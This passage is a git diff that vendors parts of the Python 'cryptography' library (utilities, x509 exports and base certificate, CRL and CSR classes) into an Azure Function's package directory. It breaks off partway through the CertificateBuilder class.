+ + +def register_interface(iface: abc.ABCMeta) -> "_RegisterDecoratorType": + def register_decorator( + klass: "_T_class", *, check_annotations: bool = False + ) -> "_T_class": + verify_interface(iface, klass, check_annotations=check_annotations) + iface.register(klass) + return klass + + return register_decorator + + +def int_to_bytes(integer: int, length: typing.Optional[int] = None) -> bytes: + return integer.to_bytes( + length or (integer.bit_length() + 7) // 8 or 1, "big" + ) + + +class InterfaceNotImplemented(Exception): + pass + + +def strip_annotation(signature: inspect.Signature) -> inspect.Signature: + return inspect.Signature( + [ + param.replace(annotation=inspect.Parameter.empty) + for param in signature.parameters.values() + ] + ) + + +def verify_interface( + iface: abc.ABCMeta, klass: object, *, check_annotations: bool = False +): + for method in iface.__abstractmethods__: + if not hasattr(klass, method): + raise InterfaceNotImplemented( + "{} is missing a {!r} method".format(klass, method) + ) + if isinstance(getattr(iface, method), abc.abstractproperty): + # Can't properly verify these yet. + continue + sig = inspect.signature(getattr(iface, method)) + actual = inspect.signature(getattr(klass, method)) + if check_annotations: + ok = sig == actual + else: + ok = strip_annotation(sig) == strip_annotation(actual) + if not ok: + raise InterfaceNotImplemented( + "{}.{}'s signature differs from the expected. Expected: " + "{!r}. Received: {!r}".format(klass, method, sig, actual) + ) + + +class _DeprecatedValue: + def __init__(self, value: object, message: str, warning_class): + self.value = value + self.message = message + self.warning_class = warning_class + + +class _ModuleWithDeprecations(types.ModuleType): + def __init__(self, module: types.ModuleType): + super().__init__(module.__name__) + self.__dict__["_module"] = module + + def __getattr__(self, attr: str) -> object: + obj = getattr(self._module, attr) + if isinstance(obj, _DeprecatedValue): + warnings.warn(obj.message, obj.warning_class, stacklevel=2) + obj = obj.value + return obj + + def __setattr__(self, attr: str, value: object) -> None: + setattr(self._module, attr, value) + + def __delattr__(self, attr: str) -> None: + obj = getattr(self._module, attr) + if isinstance(obj, _DeprecatedValue): + warnings.warn(obj.message, obj.warning_class, stacklevel=2) + + delattr(self._module, attr) + + def __dir__(self) -> typing.Sequence[str]: + return ["_module"] + dir(self._module) + + +def deprecated( + value: object, + module_name: str, + message: str, + warning_class: typing.Type[Warning], + name: typing.Optional[str] = None, +) -> _DeprecatedValue: + module = sys.modules[module_name] + if not isinstance(module, _ModuleWithDeprecations): + sys.modules[module_name] = module = _ModuleWithDeprecations(module) + dv = _DeprecatedValue(value, message, warning_class) + # Maintain backwards compatibility with `name is None` for pyOpenSSL. + if name is not None: + setattr(module, name, dv) + return dv + + +def cached_property(func: typing.Callable) -> property: + cached_name = "_cached_{}".format(func) + sentinel = object() + + def inner(instance: object): + cache = getattr(instance, cached_name, sentinel) + if cache is not sentinel: + return cache + result = func(instance) + setattr(instance, cached_name, result) + return result + + return property(inner) + + +# Python 3.10 changed representation of enums. We use well-defined object +# representation and string representation from Python 3.9. 
+class Enum(enum.Enum): + def __repr__(self) -> str: + return f"<{self.__class__.__name__}.{self._name_}: {self._value_!r}>" + + def __str__(self) -> str: + return f"{self.__class__.__name__}.{self._name_}" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py new file mode 100644 index 0000000..658e19f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py @@ -0,0 +1,249 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.x509 import certificate_transparency +from cryptography.x509.base import ( + Attribute, + AttributeNotFound, + Attributes, + Certificate, + CertificateBuilder, + CertificateRevocationList, + CertificateRevocationListBuilder, + CertificateSigningRequest, + CertificateSigningRequestBuilder, + InvalidVersion, + RevokedCertificate, + RevokedCertificateBuilder, + Version, + load_der_x509_certificate, + load_der_x509_crl, + load_der_x509_csr, + load_pem_x509_certificate, + load_pem_x509_crl, + load_pem_x509_csr, + random_serial_number, +) +from cryptography.x509.extensions import ( + AccessDescription, + AuthorityInformationAccess, + AuthorityKeyIdentifier, + BasicConstraints, + CRLDistributionPoints, + CRLNumber, + CRLReason, + CertificateIssuer, + CertificatePolicies, + DeltaCRLIndicator, + DistributionPoint, + DuplicateExtension, + ExtendedKeyUsage, + Extension, + ExtensionNotFound, + ExtensionType, + Extensions, + FreshestCRL, + GeneralNames, + InhibitAnyPolicy, + InvalidityDate, + IssuerAlternativeName, + IssuingDistributionPoint, + KeyUsage, + NameConstraints, + NoticeReference, + OCSPNoCheck, + OCSPNonce, + PolicyConstraints, + PolicyInformation, + PrecertPoison, + PrecertificateSignedCertificateTimestamps, + ReasonFlags, + SignedCertificateTimestamps, + SubjectAlternativeName, + SubjectInformationAccess, + SubjectKeyIdentifier, + TLSFeature, + TLSFeatureType, + UnrecognizedExtension, + UserNotice, +) +from cryptography.x509.general_name import ( + DNSName, + DirectoryName, + GeneralName, + IPAddress, + OtherName, + RFC822Name, + RegisteredID, + UniformResourceIdentifier, + UnsupportedGeneralNameType, +) +from cryptography.x509.name import ( + Name, + NameAttribute, + RelativeDistinguishedName, +) +from cryptography.x509.oid import ( + AuthorityInformationAccessOID, + CRLEntryExtensionOID, + CertificatePoliciesOID, + ExtendedKeyUsageOID, + ExtensionOID, + NameOID, + ObjectIdentifier, + SignatureAlgorithmOID, +) + + +OID_AUTHORITY_INFORMATION_ACCESS = ExtensionOID.AUTHORITY_INFORMATION_ACCESS +OID_AUTHORITY_KEY_IDENTIFIER = ExtensionOID.AUTHORITY_KEY_IDENTIFIER +OID_BASIC_CONSTRAINTS = ExtensionOID.BASIC_CONSTRAINTS +OID_CERTIFICATE_POLICIES = ExtensionOID.CERTIFICATE_POLICIES +OID_CRL_DISTRIBUTION_POINTS = ExtensionOID.CRL_DISTRIBUTION_POINTS +OID_EXTENDED_KEY_USAGE = ExtensionOID.EXTENDED_KEY_USAGE +OID_FRESHEST_CRL = ExtensionOID.FRESHEST_CRL +OID_INHIBIT_ANY_POLICY = ExtensionOID.INHIBIT_ANY_POLICY +OID_ISSUER_ALTERNATIVE_NAME = ExtensionOID.ISSUER_ALTERNATIVE_NAME +OID_KEY_USAGE = ExtensionOID.KEY_USAGE +OID_NAME_CONSTRAINTS = ExtensionOID.NAME_CONSTRAINTS +OID_OCSP_NO_CHECK = ExtensionOID.OCSP_NO_CHECK +OID_POLICY_CONSTRAINTS = 
ExtensionOID.POLICY_CONSTRAINTS +OID_POLICY_MAPPINGS = ExtensionOID.POLICY_MAPPINGS +OID_SUBJECT_ALTERNATIVE_NAME = ExtensionOID.SUBJECT_ALTERNATIVE_NAME +OID_SUBJECT_DIRECTORY_ATTRIBUTES = ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES +OID_SUBJECT_INFORMATION_ACCESS = ExtensionOID.SUBJECT_INFORMATION_ACCESS +OID_SUBJECT_KEY_IDENTIFIER = ExtensionOID.SUBJECT_KEY_IDENTIFIER + +OID_DSA_WITH_SHA1 = SignatureAlgorithmOID.DSA_WITH_SHA1 +OID_DSA_WITH_SHA224 = SignatureAlgorithmOID.DSA_WITH_SHA224 +OID_DSA_WITH_SHA256 = SignatureAlgorithmOID.DSA_WITH_SHA256 +OID_ECDSA_WITH_SHA1 = SignatureAlgorithmOID.ECDSA_WITH_SHA1 +OID_ECDSA_WITH_SHA224 = SignatureAlgorithmOID.ECDSA_WITH_SHA224 +OID_ECDSA_WITH_SHA256 = SignatureAlgorithmOID.ECDSA_WITH_SHA256 +OID_ECDSA_WITH_SHA384 = SignatureAlgorithmOID.ECDSA_WITH_SHA384 +OID_ECDSA_WITH_SHA512 = SignatureAlgorithmOID.ECDSA_WITH_SHA512 +OID_RSA_WITH_MD5 = SignatureAlgorithmOID.RSA_WITH_MD5 +OID_RSA_WITH_SHA1 = SignatureAlgorithmOID.RSA_WITH_SHA1 +OID_RSA_WITH_SHA224 = SignatureAlgorithmOID.RSA_WITH_SHA224 +OID_RSA_WITH_SHA256 = SignatureAlgorithmOID.RSA_WITH_SHA256 +OID_RSA_WITH_SHA384 = SignatureAlgorithmOID.RSA_WITH_SHA384 +OID_RSA_WITH_SHA512 = SignatureAlgorithmOID.RSA_WITH_SHA512 +OID_RSASSA_PSS = SignatureAlgorithmOID.RSASSA_PSS + +OID_COMMON_NAME = NameOID.COMMON_NAME +OID_COUNTRY_NAME = NameOID.COUNTRY_NAME +OID_DOMAIN_COMPONENT = NameOID.DOMAIN_COMPONENT +OID_DN_QUALIFIER = NameOID.DN_QUALIFIER +OID_EMAIL_ADDRESS = NameOID.EMAIL_ADDRESS +OID_GENERATION_QUALIFIER = NameOID.GENERATION_QUALIFIER +OID_GIVEN_NAME = NameOID.GIVEN_NAME +OID_LOCALITY_NAME = NameOID.LOCALITY_NAME +OID_ORGANIZATIONAL_UNIT_NAME = NameOID.ORGANIZATIONAL_UNIT_NAME +OID_ORGANIZATION_NAME = NameOID.ORGANIZATION_NAME +OID_PSEUDONYM = NameOID.PSEUDONYM +OID_SERIAL_NUMBER = NameOID.SERIAL_NUMBER +OID_STATE_OR_PROVINCE_NAME = NameOID.STATE_OR_PROVINCE_NAME +OID_SURNAME = NameOID.SURNAME +OID_TITLE = NameOID.TITLE + +OID_CLIENT_AUTH = ExtendedKeyUsageOID.CLIENT_AUTH +OID_CODE_SIGNING = ExtendedKeyUsageOID.CODE_SIGNING +OID_EMAIL_PROTECTION = ExtendedKeyUsageOID.EMAIL_PROTECTION +OID_OCSP_SIGNING = ExtendedKeyUsageOID.OCSP_SIGNING +OID_SERVER_AUTH = ExtendedKeyUsageOID.SERVER_AUTH +OID_TIME_STAMPING = ExtendedKeyUsageOID.TIME_STAMPING + +OID_ANY_POLICY = CertificatePoliciesOID.ANY_POLICY +OID_CPS_QUALIFIER = CertificatePoliciesOID.CPS_QUALIFIER +OID_CPS_USER_NOTICE = CertificatePoliciesOID.CPS_USER_NOTICE + +OID_CERTIFICATE_ISSUER = CRLEntryExtensionOID.CERTIFICATE_ISSUER +OID_CRL_REASON = CRLEntryExtensionOID.CRL_REASON +OID_INVALIDITY_DATE = CRLEntryExtensionOID.INVALIDITY_DATE + +OID_CA_ISSUERS = AuthorityInformationAccessOID.CA_ISSUERS +OID_OCSP = AuthorityInformationAccessOID.OCSP + +__all__ = [ + "certificate_transparency", + "load_pem_x509_certificate", + "load_der_x509_certificate", + "load_pem_x509_csr", + "load_der_x509_csr", + "load_pem_x509_crl", + "load_der_x509_crl", + "random_serial_number", + "Attribute", + "AttributeNotFound", + "Attributes", + "InvalidVersion", + "DeltaCRLIndicator", + "DuplicateExtension", + "ExtensionNotFound", + "UnsupportedGeneralNameType", + "NameAttribute", + "Name", + "RelativeDistinguishedName", + "ObjectIdentifier", + "ExtensionType", + "Extensions", + "Extension", + "ExtendedKeyUsage", + "FreshestCRL", + "IssuingDistributionPoint", + "TLSFeature", + "TLSFeatureType", + "OCSPNoCheck", + "BasicConstraints", + "CRLNumber", + "KeyUsage", + "AuthorityInformationAccess", + "SubjectInformationAccess", + "AccessDescription", + "CertificatePolicies", + 
"PolicyInformation", + "UserNotice", + "NoticeReference", + "SubjectKeyIdentifier", + "NameConstraints", + "CRLDistributionPoints", + "DistributionPoint", + "ReasonFlags", + "InhibitAnyPolicy", + "SubjectAlternativeName", + "IssuerAlternativeName", + "AuthorityKeyIdentifier", + "GeneralNames", + "GeneralName", + "RFC822Name", + "DNSName", + "UniformResourceIdentifier", + "RegisteredID", + "DirectoryName", + "IPAddress", + "OtherName", + "Certificate", + "CertificateRevocationList", + "CertificateRevocationListBuilder", + "CertificateSigningRequest", + "RevokedCertificate", + "RevokedCertificateBuilder", + "CertificateSigningRequestBuilder", + "CertificateBuilder", + "Version", + "OID_CA_ISSUERS", + "OID_OCSP", + "CertificateIssuer", + "CRLReason", + "InvalidityDate", + "UnrecognizedExtension", + "PolicyConstraints", + "PrecertificateSignedCertificateTimestamps", + "PrecertPoison", + "OCSPNonce", + "SignedCertificateTimestamps", + "SignatureAlgorithmOID", + "NameOID", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..2576bfb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..7e424ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc new file mode 100644 index 0000000..6e93c0a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc new file mode 100644 index 0000000..c9aad3f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc new file mode 100644 index 0000000..64a21e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc differ 
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc new file mode 100644 index 0000000..0a51146 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc new file mode 100644 index 0000000..f27cf91 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc new file mode 100644 index 0000000..ac670b1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py new file mode 100644 index 0000000..99e324e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py @@ -0,0 +1,1090 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +import abc +import datetime +import os +import typing + +from cryptography import utils +from cryptography.hazmat.bindings._rust import x509 as rust_x509 +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + CERTIFICATE_PRIVATE_KEY_TYPES, + CERTIFICATE_PUBLIC_KEY_TYPES, +) +from cryptography.x509.extensions import ( + Extension, + ExtensionType, + Extensions, + _make_sequence_methods, +) +from cryptography.x509.name import Name, _ASN1Type +from cryptography.x509.oid import ObjectIdentifier + + +_EARLIEST_UTC_TIME = datetime.datetime(1950, 1, 1) + + +class AttributeNotFound(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(AttributeNotFound, self).__init__(msg) + self.oid = oid + + +def _reject_duplicate_extension( + extension: Extension[ExtensionType], + extensions: typing.List[Extension[ExtensionType]], +) -> None: + # This is quadratic in the number of extensions + for e in extensions: + if e.oid == extension.oid: + raise ValueError("This extension has already been set.") + + +def _reject_duplicate_attribute( + oid: ObjectIdentifier, + attributes: typing.List[ + typing.Tuple[ObjectIdentifier, bytes, typing.Optional[int]] + ], +) -> None: + # This is quadratic in the number of attributes + for attr_oid, _, _ in attributes: + if attr_oid == oid: + raise ValueError("This attribute has already been set.") + + +def _convert_to_naive_utc_time(time: datetime.datetime) -> datetime.datetime: + """Normalizes a datetime to a naive datetime in UTC. + + time -- datetime to normalize. Assumed to be in UTC if not timezone + aware. 
+ """ + if time.tzinfo is not None: + offset = time.utcoffset() + offset = offset if offset else datetime.timedelta() + return time.replace(tzinfo=None) - offset + else: + return time + + +class Attribute: + def __init__( + self, + oid: ObjectIdentifier, + value: bytes, + _type: int = _ASN1Type.UTF8String.value, + ) -> None: + self._oid = oid + self._value = value + self._type = _type + + @property + def oid(self) -> ObjectIdentifier: + return self._oid + + @property + def value(self) -> bytes: + return self._value + + def __repr__(self) -> str: + return "".format(self.oid, self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Attribute): + return NotImplemented + + return ( + self.oid == other.oid + and self.value == other.value + and self._type == other._type + ) + + def __hash__(self) -> int: + return hash((self.oid, self.value, self._type)) + + +class Attributes: + def __init__( + self, + attributes: typing.Iterable[Attribute], + ) -> None: + self._attributes = list(attributes) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_attributes") + + def __repr__(self) -> str: + return "".format(self._attributes) + + def get_attribute_for_oid(self, oid: ObjectIdentifier) -> Attribute: + for attr in self: + if attr.oid == oid: + return attr + + raise AttributeNotFound("No {} attribute was found".format(oid), oid) + + +class Version(utils.Enum): + v1 = 0 + v3 = 2 + + +class InvalidVersion(Exception): + def __init__(self, msg: str, parsed_version: int) -> None: + super(InvalidVersion, self).__init__(msg) + self.parsed_version = parsed_version + + +class Certificate(metaclass=abc.ABCMeta): + @abc.abstractmethod + def fingerprint(self, algorithm: hashes.HashAlgorithm) -> bytes: + """ + Returns bytes using digest passed. + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + Returns certificate serial number + """ + + @abc.abstractproperty + def version(self) -> Version: + """ + Returns the certificate version + """ + + @abc.abstractmethod + def public_key(self) -> CERTIFICATE_PUBLIC_KEY_TYPES: + """ + Returns the public key + """ + + @abc.abstractproperty + def not_valid_before(self) -> datetime.datetime: + """ + Not before time (represented as UTC datetime) + """ + + @abc.abstractproperty + def not_valid_after(self) -> datetime.datetime: + """ + Not after time (represented as UTC datetime) + """ + + @abc.abstractproperty + def issuer(self) -> Name: + """ + Returns the issuer name object. + """ + + @abc.abstractproperty + def subject(self) -> Name: + """ + Returns the subject name object. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certificate_bytes(self) -> bytes: + """ + Returns the tbsCertificate payload bytes as defined in RFC 5280. + """ + + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __hash__(self) -> int: + """ + Computes a hash. 
+ """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the certificate to PEM or DER format. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +Certificate.register(rust_x509.Certificate) + + +class RevokedCertificate(metaclass=abc.ABCMeta): + @abc.abstractproperty + def serial_number(self) -> int: + """ + Returns the serial number of the revoked certificate. + """ + + @abc.abstractproperty + def revocation_date(self) -> datetime.datetime: + """ + Returns the date of when this certificate was revoked. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object containing a list of Revoked extensions. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +RevokedCertificate.register(rust_x509.RevokedCertificate) + + +class _RawRevokedCertificate(RevokedCertificate): + def __init__( + self, + serial_number: int, + revocation_date: datetime.datetime, + extensions: Extensions, + ): + self._serial_number = serial_number + self._revocation_date = revocation_date + self._extensions = extensions + + @property + def serial_number(self) -> int: + return self._serial_number + + @property + def revocation_date(self) -> datetime.datetime: + return self._revocation_date + + @property + def extensions(self) -> Extensions: + return self._extensions + + +class CertificateRevocationList(metaclass=abc.ABCMeta): + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the CRL to PEM or DER format. + """ + + @abc.abstractmethod + def fingerprint(self, algorithm: hashes.HashAlgorithm) -> bytes: + """ + Returns bytes using digest passed. + """ + + @abc.abstractmethod + def get_revoked_certificate_by_serial_number( + self, serial_number: int + ) -> typing.Optional[RevokedCertificate]: + """ + Returns an instance of RevokedCertificate or None if the serial_number + is not in the CRL. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def issuer(self) -> Name: + """ + Returns the X509Name with the issuer of this CRL. + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + Returns the date of next update for this CRL. + """ + + @abc.abstractproperty + def last_update(self) -> datetime.datetime: + """ + Returns the date of last update for this CRL. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object containing a list of CRL extensions. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certlist_bytes(self) -> bytes: + """ + Returns the tbsCertList payload bytes as defined in RFC 5280. + """ + + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __len__(self) -> int: + """ + Number of revoked certificates in the CRL. + """ + + @typing.overload + def __getitem__(self, idx: int) -> RevokedCertificate: + ... 
+ + @typing.overload + def __getitem__(self, idx: slice) -> typing.List[RevokedCertificate]: + ... + + @abc.abstractmethod + def __getitem__( + self, idx: typing.Union[int, slice] + ) -> typing.Union[RevokedCertificate, typing.List[RevokedCertificate]]: + """ + Returns a revoked certificate (or slice of revoked certificates). + """ + + @abc.abstractmethod + def __iter__(self) -> typing.Iterator[RevokedCertificate]: + """ + Iterator over the revoked certificates + """ + + @abc.abstractmethod + def is_signature_valid( + self, public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES + ) -> bool: + """ + Verifies signature of revocation list against given public key. + """ + + +CertificateRevocationList.register(rust_x509.CertificateRevocationList) + + +class CertificateSigningRequest(metaclass=abc.ABCMeta): + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __hash__(self) -> int: + """ + Computes a hash. + """ + + @abc.abstractmethod + def public_key(self) -> CERTIFICATE_PUBLIC_KEY_TYPES: + """ + Returns the public key + """ + + @abc.abstractproperty + def subject(self) -> Name: + """ + Returns the subject name object. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns the extensions in the signing request. + """ + + @abc.abstractproperty + def attributes(self) -> Attributes: + """ + Returns an Attributes object. + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Encodes the request to PEM or DER format. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certrequest_bytes(self) -> bytes: + """ + Returns the PKCS#10 CertificationRequestInfo bytes as defined in RFC + 2986. + """ + + @abc.abstractproperty + def is_signature_valid(self) -> bool: + """ + Verifies signature of signing request. + """ + + @abc.abstractmethod + def get_attribute_for_oid(self, oid: ObjectIdentifier) -> bytes: + """ + Get the attribute value for a given OID. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +CertificateSigningRequest.register(rust_x509.CertificateSigningRequest) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_certificate( + data: bytes, backend: typing.Any = None +) -> Certificate: + return rust_x509.load_pem_x509_certificate(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_der_x509_certificate( + data: bytes, backend: typing.Any = None +) -> Certificate: + return rust_x509.load_der_x509_certificate(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_csr( + data: bytes, backend: typing.Any = None +) -> CertificateSigningRequest: + return rust_x509.load_pem_x509_csr(data) + + +# Backend argument preserved for API compatibility, but ignored. 
+def load_der_x509_csr( + data: bytes, backend: typing.Any = None +) -> CertificateSigningRequest: + return rust_x509.load_der_x509_csr(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_crl( + data: bytes, backend: typing.Any = None +) -> CertificateRevocationList: + return rust_x509.load_pem_x509_crl(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_der_x509_crl( + data: bytes, backend: typing.Any = None +) -> CertificateRevocationList: + return rust_x509.load_der_x509_crl(data) + + +class CertificateSigningRequestBuilder: + def __init__( + self, + subject_name: typing.Optional[Name] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + attributes: typing.List[ + typing.Tuple[ObjectIdentifier, bytes, typing.Optional[int]] + ] = [], + ): + """ + Creates an empty X.509 certificate request (v1). + """ + self._subject_name = subject_name + self._extensions = extensions + self._attributes = attributes + + def subject_name(self, name: Name) -> "CertificateSigningRequestBuilder": + """ + Sets the certificate requestor's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._subject_name is not None: + raise ValueError("The subject name may only be set once.") + return CertificateSigningRequestBuilder( + name, self._extensions, self._attributes + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateSigningRequestBuilder": + """ + Adds an X.509 extension to the certificate request. + """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return CertificateSigningRequestBuilder( + self._subject_name, + self._extensions + [extension], + self._attributes, + ) + + def add_attribute( + self, + oid: ObjectIdentifier, + value: bytes, + *, + _tag: typing.Optional[_ASN1Type] = None, + ) -> "CertificateSigningRequestBuilder": + """ + Adds an X.509 attribute with an OID and associated value. + """ + if not isinstance(oid, ObjectIdentifier): + raise TypeError("oid must be an ObjectIdentifier") + + if not isinstance(value, bytes): + raise TypeError("value must be bytes") + + if _tag is not None and not isinstance(_tag, _ASN1Type): + raise TypeError("tag must be _ASN1Type") + + _reject_duplicate_attribute(oid, self._attributes) + + if _tag is not None: + tag = _tag.value + else: + tag = None + + return CertificateSigningRequestBuilder( + self._subject_name, + self._extensions, + self._attributes + [(oid, value, tag)], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> CertificateSigningRequest: + """ + Signs the request using the requestor's private key. 
+ """ + if self._subject_name is None: + raise ValueError("A CertificateSigningRequest must have a subject") + return rust_x509.create_x509_csr(self, private_key, algorithm) + + +class CertificateBuilder: + _extensions: typing.List[Extension[ExtensionType]] + + def __init__( + self, + issuer_name: typing.Optional[Name] = None, + subject_name: typing.Optional[Name] = None, + public_key: typing.Optional[CERTIFICATE_PUBLIC_KEY_TYPES] = None, + serial_number: typing.Optional[int] = None, + not_valid_before: typing.Optional[datetime.datetime] = None, + not_valid_after: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + ) -> None: + self._version = Version.v3 + self._issuer_name = issuer_name + self._subject_name = subject_name + self._public_key = public_key + self._serial_number = serial_number + self._not_valid_before = not_valid_before + self._not_valid_after = not_valid_after + self._extensions = extensions + + def issuer_name(self, name: Name) -> "CertificateBuilder": + """ + Sets the CA's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._issuer_name is not None: + raise ValueError("The issuer name may only be set once.") + return CertificateBuilder( + name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def subject_name(self, name: Name) -> "CertificateBuilder": + """ + Sets the 